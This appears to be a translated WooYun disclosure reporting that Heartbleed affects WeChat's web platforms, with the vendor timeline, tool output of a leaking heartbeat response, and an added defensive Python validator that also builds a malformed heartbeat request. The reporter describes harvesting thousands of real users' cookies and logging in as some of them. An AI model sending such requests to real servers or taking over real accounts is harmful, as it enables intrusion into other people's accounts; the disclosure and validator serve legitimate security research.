WeChat web client and Official Accounts platform: improper operations allow logging in as arbitrary WeChat users and obtaining sensitive server information

Vulnerability details

Disclosure status:

2014-04-08: Details reported to the vendor, awaiting vendor response
2014-04-13: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

WeChat web client and Official Accounts platform: improper operations allow logging in as arbitrary WeChat users and obtaining sensitive server information
http://wx.qq.com
http://mp.weixin.qq.com

Detailed description:

#1 Vulnerability description (CVE-2014-0160)

http://drops.wooyun.org/papers/1381

An exploit for the OpenSSL heartbeat vulnerability has already leaked. In testing, it can dump memory from any process that uses the openssl library, 64 KB at a time from a random location. Because the exploit is very easy to run, fast, and can be multithreaded, several thousand users' cookies were collected within a short time; a few picked at random turned out to allow logging in as those users.
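The over-read described above comes from the heartbeat handler trusting the payload length declared inside the message instead of checking it against the TLS record that carries it. The following added example (not code from the report or from OpenSSL) implements that missing bounds check as a record validator and a response comparison a defender can run over captured heartbeat records; the sample records are constructed here and the 0x0302 version and record layout follow RFC 6520.

```python
"""Heartbeat (RFC 6520) record validation, the check CVE-2014-0160 omitted."""
import struct

HEARTBEAT_TYPE = 24          # TLS content type for heartbeat records
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16             # RFC 6520 requires at least 16 bytes of padding


def parse_tls_record(buf):
    """Return (content_type, version, body) for one TLS record."""
    if len(buf) < 5:
        raise ValueError("truncated record header")
    ctype, version, length = struct.unpack("!BHH", buf[:5])
    body = buf[5:5 + length]
    if len(body) != length:
        raise ValueError("record body shorter than declared length")
    return ctype, version, body


def heartbeat_is_well_formed(body):
    """Bounds check a patched peer performs before echoing the payload:
    1 type byte + 2 length bytes + payload + >=16 padding must fit the record."""
    if len(body) < 3:
        return False
    declared = struct.unpack("!H", body[1:3])[0]
    return 1 + 2 + declared + MIN_PADDING <= len(body)


def classify(record):
    ctype, _ver, body = parse_tls_record(record)
    if ctype != HEARTBEAT_TYPE:
        return "not-heartbeat"
    return "heartbeat-ok" if heartbeat_is_well_formed(body) else "heartbeat-malformed"


def server_leaks(request_body, response_body):
    """A patched server silently drops a malformed request; an unpatched one
    echoes more payload bytes than the client could possibly have supplied."""
    max_sent_payload = max(len(request_body) - 3, 0)
    if len(response_body) < 3 or response_body[0] != HB_RESPONSE:
        return False
    echoed = struct.unpack("!H", response_body[1:3])[0]
    return echoed > max_sent_payload


# Constructed sample records (not taken from the report): a benign 4-byte payload...
BENIGN = (struct.pack("!BHH", HEARTBEAT_TYPE, 0x0302, 3 + 4 + 16)
          + struct.pack("!BH", HB_REQUEST, 4) + b"ping" + b"\x00" * 16)
# ...and a request whose declared payload length (0x4000) exceeds the 3 bytes present.
MALFORMED = struct.pack("!BHH", HEARTBEAT_TYPE, 0x0302, 3) + struct.pack("!BH", HB_REQUEST, 0x4000)
```

Feeding MALFORMED to a validator yields "heartbeat-malformed", which is the condition a fixed OpenSSL checks before touching the payload; server_leaks() applied to a captured response that echoes 16384 bytes for a 3-byte request, as in the tool output below, flags the server as unpatched.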

#2 Impact description

This vulnerability not only exposes cookies, source code and server configuration; researchers state that they were able to recover SSL private keys with it.

Proof of vulnerability:

# Obtaining cookies

Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 3554
... received message: type = 22, ver = 0302, length = 525
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:

Remediation:

# Update openssl to the latest version, or downgrade to an unaffected release

Copyright notice: when reposting, please credit the source: 猪猪侠@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2014-04-08 16:09

Vendor reply:

Vulnerability Rank: 8 (WooYun rating)

Latest status:

2014-04-14: Thank you for your feedback. This issue is a generic vulnerability; another white hat has already reported it through other channels before you, and the relevant business teams have been notified to fix it. Thanks again for your support; if you have any questions, please let us know and a dedicated person will follow up.


Vulnerability rating: